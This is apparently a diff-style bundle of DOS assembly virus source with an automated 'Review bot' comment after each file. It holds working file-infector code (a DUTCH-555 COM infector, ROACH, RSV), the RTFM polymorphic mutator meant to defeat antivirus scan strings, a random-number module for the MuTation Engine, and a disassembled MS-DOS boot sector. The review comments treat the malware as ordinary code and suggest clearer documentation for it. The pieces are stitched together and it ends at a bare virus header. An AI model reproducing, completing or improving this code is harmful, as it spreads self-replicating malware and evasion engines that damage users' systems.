push ax bx cx dx si di ds es bp ds dx
mov ax,4300h
call FakeInt21h ;Get attributes
mov FileAttribs,cx ;Save them
xor cx,cx
mov ax,4301h ;Reset Attributes
call FakeInt21h
mov ax,3D02h ;Open file
call FakeInt21h
mov Filehandle,ax
xchg ax,bx
mov ax,5700h
call FakeInt21h ;Get file date/time
mov cs:[FileTime],cx ; and save them
mov cs:[FileDate],dx
and cx,1Fh
cmp cx,1Fh ;Check infection in time stamp
jne Infect_File
CloseFile:
mov ah,3Eh
call FakeInt21h
pop dx ;Pop filename address
pop ds
mov cx,FileAttribs
mov ax,4301h
call FakeInt21h ;Reset Attributes
db 0e9h, 67h, 0 ;jmp DoneInfect
Infect_File:
mov ah,3Fh
push cs
pop ds
mov dx,offset Storage_Bytes
mov cx,3
call FakeInt21h ;Read in first 3 bytes
cmp word ptr cs:[Storage_Bytes],4D5Ah ;Is EXE?
je CloseFile
cmp word ptr cs:[Storage_Bytes],5A4Dh ;Is alternate EXE?
je CloseFile
mov ax,4202h
xor cx,cx
xor dx,dx
call FakeInt21h ;Go to the end of file
sub ax,3 ;adjust size for jump
mov word ptr [JumpSize],ax ;save jump size
mov ah,40h
mov dx,100h
mov cx,263h
call FakeInt21h ;Append Virus to host
mov ax,4200h
xor cx,cx
xor dx,dx ;Go to beginning
call FakeInt21h ;of host file.
mov ah,40h
mov dx,358h
mov cx,3
call FakeInt21h ;Write Jump bytes
mov ax,5701h
mov cx,[FileTime]
mov dx,[FileDate]
or cx,1Fh ;Mark infection in time stamp
call FakeInt21h ;Restore time/date
inc byte ptr cs:[Counter] ;Activation counter...
jmp short CloseFile
DoneInfect:
pop bp es ds di si dx cx bx ax
jmp ExitInt21
Int1cIP dw 0
Int1cCS dw 0
Int1cHandler: ;While infections are between C8h and F0h,
;Stick message on screen every once in a while.
pushf
push ax cx si di ds es
cmp byte ptr cs:[Counter],0C8h
jb ExitInt1c
cmp byte ptr cs:[Counter],0F0h
ja ExitInt1c
cmp word ptr cs:[TimerCount],5000h
je WriteMessageToScreen
inc word ptr cs:[TimerCount]
db 0e9h,16h,0 ;jmp ExitInt1c
WriteMessageToScreen:
push cs
pop ds
mov ax,0B800h ;Text Screen memory
mov es,ax
mov si,offset Message
mov di,0A0h
db 81h,0efh,62h,0 ;sub di,EndMessage-Message
mov cx,EndMessage-Message
rep movsb
ExitInt1c:
pop es ds di si cx ax
popf
iret
;Message says " Righard Zwienenberg made the DUTCH-555 virus!!! "
;Capital O's are attribute values....
Message:
db ' OROiOgOhOaOrOdO OZOwOiOeOnOeOnO'
db 'bOeOrOgO OmOaOdOeO OtOhOeO ODOUO'
db 'TOCOHO-O5O5O5O OVOiOrOuOsO!O!O!O'
db ' O'
EndMessage:
Counter db 0
TimerCount dw 0
JumpBytes db 0E9h
JumpSize dw 0
FileAttribs dw 0
Filehandle dw 0
FileDate dw 0
FileTime dw 0
end start
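Review bot: The analyst annotations on the two `ja GoMemRes` branches after the date check describe the opposite of the control flow: both jumps lead to the resident-install path, and it is the fall-through into DoneInstall that returns to the host. The code therefore goes resident when the year is greater than 1993 or the month is greater than 4, so the header's "only active after the spring of 1994" should read "from May 1993 onward". Suggested comments: `ja GoMemRes ;year > 1993: go resident` and `ja GoMemRes ;month > 4 (May or later): go resident`, with the `DoneInstall` label annotated as the non-activation exit. This matters for anyone using the disassembly to reason about when samples of this family would have been live.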
@@ -0,0 +1,324 @@
;------------------------------------------------------------------------------
;
; Rajaats Tiny Flexible Mutator (RTFM) V1.1 (C) 1994 by Rajaat
;
; Purpose : making it impossible to use scan strings
;
; Input :
; DS:SI = piece of code to encrypt
; ES:SI = place of decryptor+encrypted code
; CX = length of code (include the mutator (mut_len))
; BX = offset of decryptor in file
; AX = flag bits
; 0 = 1 do not use junk code
; Output :
; DS:DX = place of decryptor+encrypted code
; CX = length of encrypted code+decryptor
; BP = preserved
; Other registers might be trashed
;
; History :
; 1.0 initial version
; 1.1 the decrease counter can get an add or sub
; the increase pointer can get an add or sub
; added random byte operation with one register as trash function
;
;------------------------------------------------------------------------------
SMART
JUMPS
_text segment 'text'
assume cs:_text
.radix 16
public mut_top
public mut_bottom
public mut_len
public rnd_init
public rnd_get
public mutate
dos_get_time equ 2c
dos_get_date equ 2a
mut_bottom = $
reg enum _ax,_cx,_dx,_bx,_sp,_bp,_si,_di
seed dw 0
count dw 0
ofs dw 0
dest dw 0
indexbyte db 00000000b
countbyte db 00000000b
process db 00000000b ; bit 0 : 1 = count register set up
; 1 : 1 = index register set up
; 2 : 1 = don't use junk code
decraddr dw 0
loopaddr dw 0
opertab db 30,0,28
trash equ $
cmc
clc
stc
nop
mutate: push bp
push ds
push es
push si
call mut_delta
mut_delta: pop bp
sub bp,offset mut_delta
mov byte ptr cs:[process][bp],0
mov byte ptr cs:[indexbyte][bp],0
mov byte ptr cs:[countbyte][bp],0
mov word ptr cs:[count][bp],cx
mov word ptr cs:[ofs][bp],bx
mov word ptr cs:[dest][bp],di
test al,1
jnz usejunk
or byte ptr cs:[process][bp],4
usejunk: call rnd_init
setaction: mov al,byte ptr cs:[process][bp]
and al,3
cmp al,3
jz setregsok
jmp setregs
setregsok: call insert_trash
mov word ptr cs:[loopaddr][bp],di
mov ax,802e
stosw
getoper: call rnd_get
and ax,3
or al,al
jz getoper
mov bx,ax
add bx,bp
push ds
push cs
pop ds
lea si,opertab[bx-1]
lodsb
pop ds
mov byte ptr cs:[action][bp],al
cmp al,30
jz noaddsubflip
xor byte ptr cs:[action][bp],28
noaddsubflip: add al,byte ptr cs:[indexbyte][bp]
test al,4
jnz toomuch
xor al,6
toomuch: xor al,2
stosb
call rnd_get
stosb
push ax
call insert_trash
call rnd_get
test al,1
jnz ptrinc
test al,2
jnz ptrsub
mov ax,0c083
add ah,byte ptr cs:[indexbyte][bp]
stosw
mov al,01
stosb
jmp makecount
ptrsub: mov ax,0e883
add ah,byte ptr cs:[indexbyte][bp]
stosw
mov al,0ffh
stosb
jmp makecount
ptrinc: mov al,40
add al,byte ptr cs:[indexbyte][bp]
stosb
makecount: call insert_trash
call rnd_get
test al,1
jnz countdec
test al,2
jnz countsub
mov ax,0c083
add ah,byte ptr cs:[countbyte][bp]
stosw
mov al,0ff
stosb
jmp makeloop
countsub: mov ax,0e883
add ah,byte ptr cs:[countbyte][bp]
stosw
mov al,01
stosb
jmp makeloop
countdec: mov al,48
add al,byte ptr cs:[countbyte][bp]
stosb
makeloop: mov al,75
stosb
mov ax,word ptr cs:[loopaddr][bp]
sub ax,di
dec ax
stosb
call insert_trash
mov ax,di
sub ax,word ptr cs:[dest][bp]
add ax,word ptr cs:[ofs][bp]
push di
mov di,word ptr cs:[decraddr][bp]
stosw
pop di
pop ax
xchg al,ah
pop si
mov cx,word ptr cs:[count][bp]
encrypt: lodsb
action equ $
db 0,0e0
stosb
loop encrypt
mov cx,di
mov dx,word ptr cs:[dest][bp]
sub cx,dx
pop es
pop ds
pop bp
ret
setregs: call insert_trash
call rnd_get
test al,1
jnz firstcount
testflag byte ptr cs:[process][bp],2
jnz return
setflag byte ptr cs:[process][bp],2
call set_index
jmp setaction
firstcount: testflag byte ptr cs:[process][bp],1
jnz return
setflag byte ptr cs:[process][bp],1
call set_count
return: jmp setaction
set_index: call rnd_get
and al,1
or al,6
test ah,1
jz nobx
mov al,_bx
nobx: cmp al,byte ptr cs:[countbyte][bp]
jz set_index
mov byte ptr cs:[indexbyte][bp],al
add al,0b8
stosb
mov word ptr cs:[decraddr][bp],di
stosw
ret
set_count: call rnd_get
and al,7
cmp al,byte ptr cs:[indexbyte][bp]
jz set_count
cmp al,_sp
jz set_count
mov byte ptr cs:[countbyte][bp],al
add al,0b8
stosb
mov ax,word ptr cs:[count][bp]
stosw
ret
insert_trash: test byte ptr cs:[process][bp],4
jnz trasher
ret
trasher: call rnd_get
test ah,1
jnz specialtrash
and ax,3
or ax,ax
jz trash_done
mov cx,ax
more_trash: call rnd_get
and ax,3
lea bx,trash[bp]
add bx,ax
mov al,byte ptr cs:[bx]
stosb
loop more_trash
trash_done: ret
specialtrash: call rnd_get
and al,7
cmp al,_sp
jz specialtrash
cmp al,byte ptr cs:[indexbyte][bp]
je specialtrash
cmp al,byte ptr cs:[countbyte][bp]
je specialtrash
test ah,1
jz domov
test ah,2
jz doinc
test ah,4
jz dodec
mov al,083
stosb
regtrash: call rnd_get
mov ah,al
and al,7
cmp al,_sp
jz regtrash
cmp al,byte ptr cs:[indexbyte][bp]
jz regtrash
cmp al,byte ptr cs:[countbyte][bp]
jz regtrash
mov al,ah
or al,0c0
stosb
call rnd_get
stosb
ret
dodec: add al,8
doinc: add al,40
stosb
ret
domov: add al,0b8
storeit: stosb
call rnd_get
stosw
ret
rnd_init: mov ah,dos_get_time
int 21
xor cx,dx
mov word ptr cs:[seed][bp],cx
mov ah,dos_get_date
int 21
mov cl,al
rcr dx,cl
not dx
sbb word ptr cs:[seed][bp],dx
ret
rnd_get: push bx
mov bx,word ptr cs:[seed][bp]
in al,40
xchg ah,al
in al,40
xor ax,bx
sbb ax,bx
ror ax,1
mov word ptr cs:[seed][bp],ax
pop bx
ret
db '[RTFM]'
mut_top = $
mut_len = mut_top-mut_bottom+0fh
_text ends
end
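Review bot: The interface header describes the destination as `ES:SI` and the output as `DS:DX`, but the body saves `di` as the destination (`mov word ptr cs:[dest][bp],di`) and emits every byte through `stosb`/`stosw`, i.e. ES:DI; on return DX is that saved offset while DS and ES are simply restored from the stack, so the result is reachable as DS:DX only if the caller entered with DS equal to ES. Suggest changing the header to `ES:DI = place of decryptor+encrypted code` and `ES:DX = place of decryptor+encrypted code` (or stating the DS==ES requirement). The `testflag`/`setflag` macros used under `setregs` and `firstcount` are not defined anywhere in this file, so the header should also name the include they come from.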
+68
@@ -0,0 +1,68 @@
; A pseudo random numbers generator
; for use with the MuTation Engine <tm>
; Version 1.01 (26-10-91)
; (C) 1991 CrazySoft, Inc.
.model tiny
.code
public rnd_init, rnd_get, rnd_buf, data_top
rnd_init:
push ds si dx cx bx
xor ah,ah
int 1ah
in al,[40h]
mov ah,al
in al,[40h]
xor ax,cx
xor dx,ax
push cs
pop ds
mov si,offset rnd_buf
xor bh,bh
jmp short rnd_put
rnd_get:
push ds si dx cx bx
push cs
pop ds
mov si,offset rnd_buf
mov bl,[si]
xor bh,bh
mov ax,[bx+si+2]
mov dx,[bx+si+4]
add byte ptr [si],4
mov cx,7
rnd_lup:
shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns nxt_bit
inc al
nxt_bit:
loop rnd_lup
rnd_put:
mov bl,[si+1]
mov [bx+si+2],ax
mov [bx+si+4],dx
add bl,4
mov [si+1],bl
mov al,dl
cmp bl,[si]
jnz rnd_done
add byte ptr [si],4
rnd_done:
pop bx cx dx si ds
ret
.data
rnd_buf dw 129 dup(?)
data_top:
end
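Review bot: The header gives version and author but no register contract, which has to be reverse-read from the body: `rnd_get` returns one byte in `al` (`mov al,dl` before `rnd_done`), leaves `ah` holding loop state, and preserves BX, CX, DX, SI and DS through the push/pop pairs, while `rnd_init` seeds from the BIOS tick count (`int 1ah`) mixed with two reads of port 40h. The `rnd_buf` layout the code implies is also undocumented: byte 0 is the read index, byte 1 the write index, and 32-bit entries follow from offset 2, advanced by 4 and wrapping at 256 because the indices are bytes. A comment block above `rnd_init` along the lines of `; rnd_init: seed rnd_buf from BIOS ticks + PIT; rnd_get: next byte in AL, AH clobbered, other regs preserved` would make the public symbols usable without tracing the loop.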

+311
@@ -0,0 +1,311 @@
;Developed and Programmed in Australia.
;Copy_ya_right 1997
;Virus Name : ROACH
;The ROACH virus will install itself memory resident, below the video memory.
;once this virus is in memory it will only infect COM files. It will not
;infect command.com.
;--------------------------- S T A R T -------------------------------------
host_start: ;start of the host file
jmp virus_start ;start the virus code
mov ah,4ch ;exit the virus code
int 21h ;dos call
;----- This is the start of the virus code ----------------------------------
virus_start: ;start of the virus code
mov ax,sp ;load ax with stack pointer
mov si,ax ;move stack pointer to si
mov ax,ss ;move stack segment to ax
mov ds,ax ;load ds with stack segment
mov di,100h ;point to the host start
mov cx,2 ;we need to do this twice
push_100_to_stack:
dec si,2 ;dec the stack pointer
mov sp,si ;move the stack pointer
mov word ptr ds:[si],di ;save di to the stack
loop push_100_to_stack ;do it twice
inc di ;inc byte one
mov al,byte ptr es:[di]
mov ah,byte ptr es:[di+1]
add ax,103h
mov bp,ax ;save to the
add si,2 ;inc the stack pointer
mov sp,si ;mov the stack pointer
mov di,word ptr ds:[si] ;get the address from stack
mov si,bp ;load si with fix address
add si,virus_len ;and host to the source index
sub si,3
push es
pop ds ;get the data segment
mov cx,3 ;move 3 bytes
rep movsb ;and move the data back
mov ax,5432h ;are we resident
int 21h ;dos call
cmp ax,0063h ;are we resident
jne memory_resident ;lets go resident
exit_virus:
xor ax,ax ;fix up
mov bx,ax ;fix up
mov cx,ax ;fix up
mov dx,ax ;fix up
mov di,ax ;fix up
mov si,ax ;fix up
mov es,ax ;fix up
ret ;and return to the host
;----- This makes the virus go memory resident ------------------------------
memory_resident:
mov ah,52h ;get the list of lists
int 21h ;dos call
mov ax,es:[bx-2] ;load ax first mcb chain
mov es,ax ;set es to first mcb block
mcb1:
cmp byte ptr es:[0],'Z' ;is it the last mcb chain
jne mcb2 ;not then next mcb chain
clc ;clear carry flag
jmp mcbx ;found last mcb chain, bail
mcb2:
mov ax,es ;mov extra segment to ax
add ax,word ptr es:[3] ;add from the list
inc ax ;fix up
mov es,ax ;es is the new segment
jmp short mcb1 ;and do it again
mcbx:
mov byte ptr es:[0],'Z' ;make it the last mcb chain
sub word ptr es:[3],virus_len/15 ;take the virus from the mcb
add ax,word ptr es:[3] ;
inc ax ;fix up the address
mov es,ax ;es is the new segment
push es ;save to the stack
push cs ;push the code segment
pop ds ;get ds from the stack
mov ax,3521h ;get interrupt 21h
int 21h ;dos call
mov si,bp ;load the si with virus start
add si,virus_len ;add the virus len to it
sub si,7
mov word ptr ds:[si],bx ;save the old int 21h vector
mov word ptr ds:[si+2],es ;save the old int 21h vector
pop ds ;get from the stack
mov ax,2521h ;get the interrupt vector
mov dx,new_21
int 21h ;dos call
push ds
pop es
push cs
pop ds
xor di,di
mov si,bp ;offset of the start of virus
mov cx,virus_len ;number of bytes to move
do_load_tsr:
mov ax,word ptr ds:[si] ;load the byte from host
mov word ptr es:[di],ax ;store the byte in memory
add si,2 ;inc the host pointer
add di,2 ;inc the memory pointer
loop do_load_tsr
push cs ;push the code segment
pop ds ;reset ds to the original
jmp exit_virus ;exit the virus code
db '[Roach] by SliceMaster 1997' ;copyright string roach
;----- This is the code that runs in memory ---------------------------------
exit_virus_tsr:
jmp dword ptr cs:[data_start] ;exit back to the function
fake_dos_function:
pushf ;save the flags
call dword ptr cs:[data_start] ;fake a dos call
ret ;and return
new_21h:
cmp ax,5432h ;is it the virus checking
jne check_interrupts ;check out the interrupts
mov ax,0063h ;yep we are in memory
iret ;interrupt return
check_interrupts:
inc ah ;add one the the function
cmp ah,4ch ;load and exec a program
je go_virus_infect ;this is our interrupt
cmp ah,3eh ;open file call
je go_virus_infect ;this is our interrupt
cmp ah,44h ;change attrubute call
je go_virus_infect ;this is our interrupt
dec ah ;sub one from the function
jmp exit_virus_tsr ;exit the virus in memory
go_virus_infect:
dec ah ;fix up before we exit
push ax ;\
push bx ; \
push cx ; \
push dx ; \
push si ; / save to the stack
push di ; / so the interrupt
push ds ; / will work on
push es ; / exit.
push bp ;/
call check_ext ;is it a com file
call open_host ;open the host file for r/w
call read_host_3 ;read the host first 3
call infect_host ;infect file
exit_host_infected:
call close_host ;close the host file
exit_virus_memory: ;ti we are here.
pop ax ;/
jmp exit_virus_tsr ;exit the virus tsr
;----- This checks the file ext --------------------------------------------
check_ext:
push dx
pop si ;get the source index
mov cx,0ffh ;search for a com file ext
find_ext:
mov al,byte ptr ds:[si] ;load the byte at ds:dx
cmp al,'.' ;is it a .
je found_ext ;found the ext
inc si ;inc the location
loop find_ext ;do it again
found_ext:
inc si ;inc the position
mov ax,word ptr ds:[si] ;load the byte ad ds:si
cmp ax,'OC' ;is it a com file
je found_com_file ;do a nother check
pop ax ;get off the stack
jmp exit_virus_memory ;not com file bail
found_com_file:
ret ;and return
;----- This opens a host file -----------------------------------------------
open_host:
mov ax,3d02h ;open file read write access
call fake_dos_function ;fake a dos interrupt
mov bx,ax ;move the handle into bx
ret ;and return
;----- This closes a host file ----------------------------------------------
close_host:
mov ah,3eh ;close a file
call fake_dos_function ;close the file
ret ;and return
;----- This reads the first 3 bytes from the host ---------------------------
read_host_3:
push ds ;save to the stack
push dx ;save to the stack
push cs ;push the code segment
pop ds ;get the tsr segment
xor dx,dx ;zero out dx
add dx,virus_len ;add the virus len to it
sub dx,3 ;fix up dx to point to buffer
push dx ;save to the stack
mov ah,3fh ;read from the host
mov cx,3 ;read 3 bytes of host
call fake_dos_function ;fake a dos call
pop si ;get si from the stack
mov ah,byte ptr ds:[si] ;load ah with the first byte
cmp ah,0e9h ;is it a jump instruction
je is_infect ;is the file infected
cmp ah,'M' ;does it have a MZ header
je is_infect ;the file is a command.com
pop dx ;get call from the stack
pop ds ;get call from the stack
ret ;and return
is_infect:
pop dx ;get from the stack
pop ds ;get call from the stack
pop ax ;get call from the stack
jmp exit_host_infected ;exit the host is infected
;----- This infects the host file -------------------------------------------
infect_host:
push ds ;save to the stack
push dx ;save to the stack
call lseek_end ;seek to the end of the host
push ax ;save the location
push cs ;push the code segment
pop ds ;get the virus segment
mov ah,40h ;time to write virus to end
mov cx,virus_len ;number of bytes to write
xor dx,dx ;at the start of the segment
call fake_dos_function ;fake a dos function
call lseek_start ;seek to the start
xor dx,dx ;zero out dx
add dx,virus_len ;add the virus len to it
sub dx,3 ;fix up dx to point to buffer
mov si,dx ;mov si the pointer
mov ah,0e9h ;mov jump instruction in ah
mov byte ptr ds:[si],ah ;write the jump in
pop ax ;get off the stack
dec al,3
mov word ptr ds:[si+1],ax ;write the address to buffer
mov dx,si ;write to dx the pointer
mov cx,3 ;number of bytes to write
mov ah,40h ;write to the host file
call fake_dos_function ;fake a dos function call
pop dx ;get off the stack
pop ds ;get off the stack
ret ;and return
;----- This seeks to the start or end of the host ---------------------------
lseek_end:
mov ax,4202h ;seek to the end
jmp lseek ;and do the seeking
lseek_start:
mov ax,4200h ;seek to the start
lseek:
xor dx,dx ;to start/end of host
xor cx,cx ;to start/end of host
call fake_dos_function ;fake a dos call
ret ;and return
;----- From here down is were all the data for virus is stored!! ------------
data1:
old_21h dd 0 ;old interrupt 21h function
host_3 db 3 dup(90h) ;original first 3 bytes
virus_end:
virus_len equ virus_end - virus_start ;len of the virus code
data_start equ data1 - virus_start ;starting address of data
new_21 equ new_21h - virus_start ;len from the start to int
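Review bot: The comparisons under `check_interrupts` are performed after `inc ah`, so each constant is one above the DOS function it actually matches: `cmp ah,4ch` selects 4Bh, `cmp ah,3eh` selects 3Dh and `cmp ah,44h` selects 43h. The side comments happen to name the functions correctly, but a reader who misses the increment will read them as errors; a comment on the `inc ah` line such as `;AH is offset by one, so the compares below use function+1` would remove the ambiguity, and the two `dec ah` lines that undo it deserve a matching remark.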
+249
@@ -0,0 +1,249 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ ROOT ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 30-Aug-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_0001e equ 78h
data_0002e equ 7C0Bh ;*
data_0003e equ 7C0Dh ;*
data_0004e equ 7C0Eh ;*
data_0005e equ 7C10h ;*
data_0006e equ 7C11h ;*
data_0007e equ 7C13h ;*
data_0008e equ 7C15h ;*
data_0009e equ 7C16h ;*
data_0010e equ 7C18h ;*
data_0011e equ 7C1Ah ;*
data_0012e equ 7C1Ch ;*
data_0013e equ 7C1Eh ;*
data_0014e equ 7C20h ;*
data_0015e equ 7C24h ;*
data_0016e equ 7C25h ;*
data_0017e equ 7C3Eh ;*
data_0018e equ 7C49h ;*
data_0019e equ 7C4Bh ;*
data_0020e equ 7C4Dh ;*
data_0021e equ 7C4Fh ;*
data_0022e equ 7C50h ;*
data_0023e equ 7C52h ;*
data_0024e equ 7D9Eh ;*
data_0025e equ 7DE6h ;*
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
root proc far
start:
jmp short loc_0002
db 90h
db 'MSDOS5.0'
db 00h, 02h, 04h, 01h, 00h, 02h
db 00h, 02h,0FEh,0EFh,0F8h, 3Ch
db 00h, 11h, 00h, 0Fh, 00h, 11h
db 7 dup (0)
db 80h, 00h, 29h, 27h, 45h, 08h
db 19h
db 'MS-DOS_5 FAT16 '
loc_0002:
cli ; Disable interrupts
xor ax,ax ; Zero register
mov ss,ax
mov sp,7C00h
push ss
pop es
mov bx,data_0001e
lds si,dword ptr ss:[bx] ; Load 32 bit ptr
push ds
push si
push ss
push bx
mov di,data_0017e
mov cx,0Bh
cld ; Clear direction
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
push es
pop ds
mov byte ptr [di-2],0Fh
mov cx,ds:data_0010e
mov [di-7],cl
mov [bx+2],ax
mov word ptr [bx],7C3Eh
sti ; Enable interrupts
int 13h ; Disk dl=drive a ah=func 00h
; reset disk, al=return status
jc loc_0004 ; Jump if carry Set
xor ax,ax ; Zero register
cmp ds:data_0007e,ax
je loc_0003 ; Jump if equal
mov cx,ds:data_0007e
mov ds:data_0014e,cx
loc_0003:
mov al,ds:data_0005e
mul word ptr ds:data_0009e ; ax = data * ax
add ax,ds:data_0012e
adc dx,ds:data_0013e
add ax,ds:data_0004e
adc dx,0
mov ds:data_0022e,ax
mov ds:data_0023e,dx
mov ds:data_0018e,ax
mov ds:data_0019e,dx
mov ax,20h
mul word ptr ds:data_0006e ; ax = data * ax
mov bx,ds:data_0002e
add ax,bx
dec ax
div bx ; ax,dx rem=dx:ax/reg
add ds:data_0018e,ax
adc word ptr ds:data_0019e,0
mov bx,500h
mov dx,ds:data_0023e
mov ax,ds:data_0022e
call sub_0002
jc loc_0004 ; Jump if carry Set
mov al,1
call sub_0003
jc loc_0004 ; Jump if carry Set
mov di,bx
mov cx,0Bh
mov si,data_0025e
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jnz loc_0004 ; Jump if not zero
lea di,[bx+20h] ; Load effective addr
mov cx,0Bh
repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di]
jz loc_0006 ; Jump if zero
loc_0004:
mov si,data_0024e
call sub_0001
xor ax,ax ; Zero register
int 16h ; Keyboard i/o ah=function 00h
; get keybd char in al, ah=scan
pop si
pop ds
pop word ptr [si]
pop word ptr [si+2]
int 19h ; Bootstrap loader
loc_0005:
pop ax
pop ax
pop ax
jmp short loc_0004
loc_0006:
mov ax,[bx+1Ah]
dec ax
dec ax
mov bl,ds:data_0003e
xor bh,bh ; Zero register
mul bx ; dx:ax = reg * ax
add ax,ds:data_0018e
adc dx,ds:data_0019e
mov bx,700h
mov cx,3
locloop_0007:
push ax
push dx
push cx
call sub_0002
jc loc_0005 ; Jump if carry Set
mov al,1
call sub_0003
pop cx
pop dx
pop ax
jc loc_0004 ; Jump if carry Set
add ax,1
adc dx,0
add bx,ds:data_0002e
loop locloop_0007 ; Loop if cx > 0
mov ch,ds:data_0008e
mov dl,ds:data_0015e
mov bx,ds:data_0018e
mov ax,ds:data_0019e
;* jmp far ptr loc_0001 ;*
db 0EAh, 00h, 00h, 70h, 00h
root endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_0001 proc near
loc_0008:
lodsb ; String [si] to al
or al,al ; Zero ?
jz loc_ret_0010 ; Jump if zero
mov ah,0Eh
mov bx,7
int 10h ; Video display ah=functn 0Eh
; write char al, teletype mode
jmp short loc_0008
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_0002:
cmp dx,ds:data_0010e
jae loc_0009 ; Jump if above or =
div word ptr ds:data_0010e ; ax,dxrem=dx:ax/data
inc dl
mov ds:data_0021e,dl
xor dx,dx ; Zero register
div word ptr ds:data_0011e ; ax,dxrem=dx:ax/data
mov ds:data_0016e,dl
mov ds:data_0020e,ax
clc ; Clear carry flag
retn
loc_0009:
stc ; Set carry flag
loc_ret_0010:
retn
sub_0001 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_0003 proc near
mov ah,2
mov dx,ds:data_0020e
mov cl,6
shl dh,cl ; Shift w/zeros fill
or dh,ds:data_0021e
mov cx,dx
xchg ch,cl
mov dl,ds:data_0015e
mov dh,ds:data_0016e
int 13h ; Disk dl=drive ? ah=func 02h
; read sectors to memory es:bx
; al=#,ch=cyl,cl=sectr,dh=head
retn
sub_0003 endp
db 0Dh, 0Ah, 'Non-System disk or dis'
db 'k error', 0Dh, 0Ah, 'Replace and'
db ' press any key when ready', 0Dh, 0Ah
db 0
db 'IO SYSMSDOS SYS'
db 00h, 00h, 55h,0AAh
seg_a ends
end start
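Review bot: Nothing in the listing states what this code is, and the `data_00xxe` equates are bare addresses, so every field has to be re-derived. The OEM string `'MSDOS5.0'`, the 0:7C00h stack setup, the `'IO      SYSMSDOS   SYS'` names and the 'Non-System disk or disk error' text indicate a disassembly of a stock MS-DOS 5.0 boot sector rather than viral code; if that is what the 'ROOT' entry is meant to document, the header should say so. The equates from `data_0002e` onward appear to be the BIOS Parameter Block fields of the sector as loaded at 7C00h (7C0Bh bytes per sector, 7C0Dh sectors per cluster, 7C0Eh reserved sectors, 7C10h FAT count, 7C11h root entries, 7C16h sectors per FAT, 7C18h sectors per track, 7C1Ah heads, 7C1Ch hidden sectors), which is consistent with the arithmetic at `loc_0003`; adding the field name to each `;*` comment would make that block readable.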
+160
@@ -0,0 +1,160 @@
;
; RSV - written by Conzouler 1995
;
; memory resident
; com-append on execute
; no tb-flags
; no impressive features...
;
.model tiny
.code
.286
org 100h
psize equ (offset last - offset entry) / 10h + 1
size equ offset last - offset entry
entry:
db 0e9h,0,0
start:
call gores
oentry db 0CDh,20h,90h
gores:
mov ax, 4277h
int 21h
jnc restore
mov ah, 4Ah
mov bx, 0FFFFh
int 21h
mov ah, 4Ah
sub bx, psize+1
int 21h
mov ah, 48h
mov bx, psize
int 21h
sub ax, 10h
mov es, ax
mov word ptr es:[0F1h], 8
mov di, 103h
mov bp, sp
mov si, ss:[bp]
sub si, 3
mov cx, size-3
rep movsb
push es
pop ds
mov ax, 3521h
int 21h
mov i21o, bx
mov i21s, es
mov ah, 25h
mov dx, offset vec21
int 21h
restore:
push cs
pop ds
push ds
pop es
pop si
mov di, 100h
push di
movsw
movsb
retn
i21: db 0eAh
i21o dw ?
i21s dw ?
vec21:
cmp ax, 4277h
jne v21e
clc
retf 2
v21e: cmp ax, 4B00h
je infect
v21x:
jmp i21
infect:
push ax
push bx
push cx
push dx
push si
push ds
mov ax, 3D82h
int 21h
xchg ax, bx
push cs
pop ds
mov ah, 3Fh
mov dx, offset oentry
mov cx, 3
int 21h
cmp byte ptr oentry, 'M'
je infectx
mov ax, 4202h
xor cx, cx
cwd
int 21h
dec ax
mov si, ax
xchg dx, ax
mov ax, 4200h
int 21h
mov dx, offset last
mov ah, 3Fh
mov cx, 1
int 21h
cmp byte ptr last, 087h
je infectx
xchg ax, si
sub ax, 2
mov byte ptr entry, 0E9h
mov word ptr entry[1], ax
mov ah, 3Fh
inc ah
push ax
mov dx, 103h
mov cx, size-3
int 21h
mov ax, 4200h
xor cx, cx
cwd
int 21h
pop ax
mov dx, 100h
mov cx, 3
int 21h
infectx:
mov ah, 3Eh
int 21h
pop ds
pop si
pop dx
pop cx
pop bx
pop ax
jmp v21x
last:
end entry
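Review bot: The memory handling under `gores` is written purely through offsets with no explanation: after `mov ah, 48h / int 21h` the returned segment is lowered by 10h before being loaded into `es`, which makes `es:[0F1h]` the owner word of the block's MCB (segment-1, offset 1) and `es:103h` the third byte of the block viewed as if it were `org 100h`. A comment on the `sub ax, 10h` line such as `; es = block-10h: es:0F1h is the MCB owner word, es:103h == block:0003h` would spare the next reader the arithmetic. The `size` equate also shadows the MASM `SIZE` operator; a name like `vlen` would be unambiguous.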
+265
@@ -0,0 +1,265 @@
;******************************************************************************
;
; RTL4 / WEDDEN DAT... VIRUS
;
;******************************************************************************
;
